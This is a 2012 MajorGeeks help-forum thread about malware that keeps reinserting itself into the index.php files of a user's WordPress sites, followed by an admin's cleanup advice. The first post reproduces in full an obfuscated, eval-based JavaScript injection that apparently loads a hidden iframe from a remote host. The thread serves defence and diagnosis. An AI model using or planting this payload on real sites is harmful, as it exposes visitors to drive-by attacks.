website malware

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by petercl, Feb 16, 2012.

  1. petercl

    petercl Private E-2

    Have multiple wordpress and php websites on a shared domain. Have recently encountered a malware program that was inserted probable through one of the wp blogs. The malware inserts the script into the index.php file of all websites on the domain. the code is as follows.... inside the double brackets

    {{ <script>if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=eval;t='y';}h=2*Math.cos(Math.PI);n=[4.5,4.5,52.5,51,16,20,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,20.5,61.5,4.5,4.5,4.5,52.5,51,57,48.5,54.5,50.5,57,20,20.5,29.5,4.5,4.5,62.5,16,50.5,54,57.5,50.5,16,61.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,59.5,57,52.5,58,50.5,20,17,30,52.5,51,57,48.5,54.5,50.5,16,57.5,57,49.5,30.5,19.5,52,58,58,56,29,23.5,23.5,58,50,57.5,24.5,27.5,25.5,23,24.5,50,58.5,54.5,49,23,49.5,55.5,54.5,23.5,57.5,58,50,57.5,23.5,51.5,55.5,23,56,52,56,31.5,57.5,52.5,50,30.5,24.5,19.5,16,59.5,52.5,50,58,52,30.5,19.5,24.5,24,19.5,16,52,50.5,52.5,51.5,52,58,30.5,19.5,24.5,24,19.5,16,57.5,58,60.5,54,50.5,30.5,19.5,59,52.5,57.5,52.5,49,52.5,54,52.5,58,60.5,29,52,52.5,50,50,50.5,55,29.5,56,55.5,57.5,52.5,58,52.5,55.5,55,29,48.5,49,57.5,55.5,54,58.5,58,50.5,29.5,54,50.5,51,58,29,24,29.5,58,55.5,56,29,24,29.5,19.5,31,30,23.5,52.5,51,57,48.5,54.5,50.5,31,17,20.5,29.5,4.5,4.5,62.5,4.5,4.5,51,58.5,55,49.5,58,52.5,55.5,55,16,52.5,51,57,48.5,54.5,50.5,57,20,20.5,61.5,4.5,4.5,4.5,59,48.5,57,16,51,16,30.5,16,50,55.5,49.5,58.5,54.5,50.5,55,58,23,49.5,57,50.5,48.5,58,50.5,34.5,54,50.5,54.5,50.5,55,58,20,19.5,52.5,51,57,48.5,54.5,50.5,19.5,20.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,57.5,57,49.5,19.5,22,19.5,52,58,58,56,29,23.5,23.5,58,50,57.5,24.5,27.5,25.5,23,24.5,50,58.5,54.5,49,23,49.5,55.5,54.5,23.5,57.5,58,50,57.5,23.5,51.5,55.5,23,56,52,56,31.5,57.5,52.5,50,30.5,24.5,19.5,20.5,29.5,51,23,57.5,58,60.5,54,50.5,23,59,52.5,57.5,52.5,49,52.5,54,52.5,58,60.5,30.5,19.5,52,52.5,50,50,50.5,55,19.5,29.5,51,23,57.5,58,60.5,54,50.5,23,56,55.5,57.5,52.5,58,52.5,55.5,55,30.5,19.5,48.5,49,57.5,55.5,54,58.5,58,50.5,19.5,29.5,51,23,57.5,58,60.5,54,50.5,23,54,50.5,51,58,30.5,19.5,24,19.5,29.5,51,23,57.5,58,60.5,54,50.5,23,58,55.5,56,30.5,19.5,24,19.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,59.5,52.5,50,58,52,19.5,22,19.5,24.5,24,19.5,20.5,29.5,51,23,57.5,50.5,58,32.5,58,58,57,52.5,49,58.5,58,50.5,20,19.5,52,50.5,52.5,51.5,52,58,19.5,22,19.5,24.5,24,19.5,20.5,29.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,23,48.5,56,56,50.5,55,50,33.5,52,52.5,54,50,20,51,20.5,29.5,4.5,4.5,62.5];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*n[j]);}e(ss);</script> }}

    Anybody had any experience with this? i have deleted it and it rewrites itself after a few hours. i have been able to stop its propigation by changing the file permissions to read only. any help appreciated. Thanks
     
    petercl, Feb 16, 2012
    #1
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    This is not something we can help you with. Website files have to be cleaned manually ( 100 % of them ) or restored from a full back. The code for the websites have be properly coded to avoid security holes and has to use current updated web design software. Expert developers who are familiar with security issues should be designing the web site. You need to change your login and passwords too to make sure that you can stop anyone who may have stolen login and password info which gives them full access. Make sure ftp passwords are changed too.

    Also the web host you are using, must make sure they are properly protected to avoid them being the source of your infection.
     
    chaslang, Feb 16, 2012
    #2

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds